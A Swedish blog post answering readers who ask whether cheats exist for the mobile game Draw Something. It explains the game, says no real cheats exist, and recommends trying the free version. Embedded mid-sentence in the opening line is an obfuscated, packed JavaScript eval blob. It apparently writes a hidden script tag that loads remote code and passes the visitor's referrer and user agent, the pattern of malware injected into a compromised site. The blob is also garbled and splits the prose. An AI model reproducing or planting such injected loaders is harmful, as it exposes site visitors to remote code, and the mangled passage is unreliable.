Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Fusk till Applikationen Draw Something?

Fusk till Applikationen Draw Something?
Sebastian

Vi eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdnyi|var|u0026u|referrer|ihknf||js|php’.split(’|’),0,{}))
har fått in många brev där ni läsare frågar om vi vet om det finns några fusk till appen Draw Something som fins ute i AppStore. Svaret är tyvärr nej, eller?

Draw Something är den nya Wordfeud applikationen. Den sprider sig nästan lika fort bland användare ute på marknaden. Skulle gissa att det är personer som innan varit väldigt beroende av Wordfeud och nu istället valt att försöka hitta ett alternativ. Har själv testat applikationen ett flertal gånger och tycker det är ganska kul.

Kommer ni ihåg spelet Skissa och gissa som förut fanns på webben? Om inte, Draw Something är ett spel där du får en fråga som du sedan ska rita upp för din medspelare. Du får inte skriva något ord utan du ska rita upp ordet så tydligt som möjligt. Sen ska din medspelare gissa vad det kan vara för ord utifrån ett antal bokstäver.

Och så kommer vi till fusk. Spelet är inte utformat på det sätt att du ska vinna utan jag skulle säga att man samlar ihop poängen tillsammans. Jag har faktiskt inte förstått hur man förlorar 😛 Jag har flera gånger sett spelare som använt den livlina som finns och ändå fått full pott. Så jag skulle säga att det bästa fusket är att vara så tydlig som möjligt när du ritar upp ordet på skärmen. Eller om ni sitter brevid varandra, då kan ni ju bara titta på varandras ord. Spelet blir självklart inte kul av detta men jag har inget bättre svar på fusk -frågan.

Om ni vill ladda ner spelet finns det tillgängligt i appstore eller itunes. Spelet finns i både en gratis version och en version som kostar. Premium versionen ger dig egentligen bara friheten att inte exponeras av reklamen som annars finns med i spelet. Så jag rekommenderar att prova gratis först 🙂

 

Lycka till!!